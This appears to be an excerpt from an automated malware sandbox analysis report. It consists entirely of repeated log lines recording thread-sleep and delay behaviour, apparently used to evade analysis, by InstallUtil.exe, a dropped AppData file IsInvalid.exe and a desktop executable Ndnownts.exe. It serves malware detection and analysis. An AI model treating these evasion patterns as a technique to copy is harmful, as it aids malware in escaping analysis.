                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -595062s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -594953s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -594844s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -594719s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -594609s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -594500s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 4484Thread sleep time: -594390s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -23058430092136925s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -100000s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 396Thread sleep count: 3385 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 396Thread sleep count: 3266 > 30Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99875s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99656s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99547s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99437s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99328s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99217s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -99109s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98872s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98765s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98626s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98391s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98259s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98156s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -98047s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97937s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97828s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97719s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97609s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97500s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97390s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97281s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97172s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -97062s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96953s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96843s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96734s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96623s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96515s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96400s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96295s >= -30000sJump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exe TID: 5852Thread sleep time: -96187s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep count: 31 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -28592453314249787s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -600000s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599891s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 428Thread sleep count: 7927 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep count: 34 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 428Thread sleep count: 1896 > 30Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599766s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599657s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599532s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599422s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -599063s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598938s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598813s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598704s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598579s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598454s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598329s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598204s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -598079s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597954s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597829s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597704s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597579s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597454s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597329s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597204s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -597079s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596954s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596829s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596704s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596591s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596469s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596360s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596235s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -596110s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595985s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595860s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595735s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595610s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595499s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595375s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595266s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595141s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -595032s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594907s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594782s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594672s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594563s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594438s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594313s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594188s >= -30000sJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 2212Thread sleep time: -594063s >= -30000sJump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99867Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99766Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99543Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99438Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99313Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99184Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 99078Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98965Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98857Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98750Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98638Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98528Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98420Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98313Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98172Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 98047Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97930Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97828Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97719Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97609Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97497Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97391Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97281Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97172Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 97063Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96953Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96844Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96734Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96625Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96516Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96406Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96297Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96188Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 96063Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95938Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95813Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95703Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95594Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95429Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95327Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95219Jump to behavior
                Source: C:\Users\user\Desktop\Ndnownts.exeThread delayed: delay time: 95110Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599328Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599219Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599107Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598984Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598875Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598765Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598656Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598547Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598435Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598312Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598199Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597968Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597748Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597625Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597515Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597406Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597078Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596969Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596859Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596750Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596640Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596514Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596359Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596090Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595947Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594719Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594609Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594500Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 100000Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99875Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99656Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99547Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99437Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99328Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99217Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 99109Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98872Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98765Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98626Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98391Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98259Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98156Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 98047Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97937Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97828Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97719Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97609Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97500Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97390Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97281Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97172Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 97062Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96953Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96843Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96734Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96623Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96515Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96400Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96295Jump to behavior
                Source: C:\Users\user\AppData\Roaming\IsInvalid.exeThread delayed: delay time: 96187Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599891Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599657Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599532Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599313Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599188Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599063Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598938Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598704Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598579Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598454Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598329Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598204Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598079Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597954Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597829Jump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597704Jump to behavior
